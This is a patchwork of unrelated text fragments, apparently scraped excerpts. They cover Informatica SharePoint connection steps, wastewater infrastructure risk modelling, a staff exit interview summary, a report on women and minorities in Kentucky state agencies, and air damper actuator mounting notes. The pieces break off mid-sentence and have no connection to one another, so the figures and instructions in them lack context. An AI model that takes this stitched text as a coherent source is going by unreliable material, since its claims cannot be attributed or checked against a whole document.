2. In source select the connection as SharePoint and the source type as single 3. Click the Next button, then it will go to the Target Tab.. Informatica Worldwide Headquarters,

Risk-based Modelling for Wastewater Infrastructure Asset Management

regional level to determine historic levels of service and the proportions of service impacts associated with an asset failure. • The service impact characteristics are assumed to

Exit Interview Summary 01/07/13 to 30/09/13

In the last report just under 50% of those staff interviewed said that they would recommend the Trust to family and friends as a place to work and 60% as a place to have treatment..

The Status of Women and Minorities in Kentucky State Agencies An analysis of employment, job levels and salaries

They include: Economic Development; Education, Arts &amp; Humanities; Families &amp; Children; Finance &amp; Administration; Health Services; Labor; Personnel; Revenue; and

Air damper actuators Rotary version, two-position control, with spring return, AC 24 V or AC 230 V

– The actuator must turn from 0° to 90° (end position with rotational angle limitation) Mounting notes Mounting instructions Mounting position Housing protection Mounting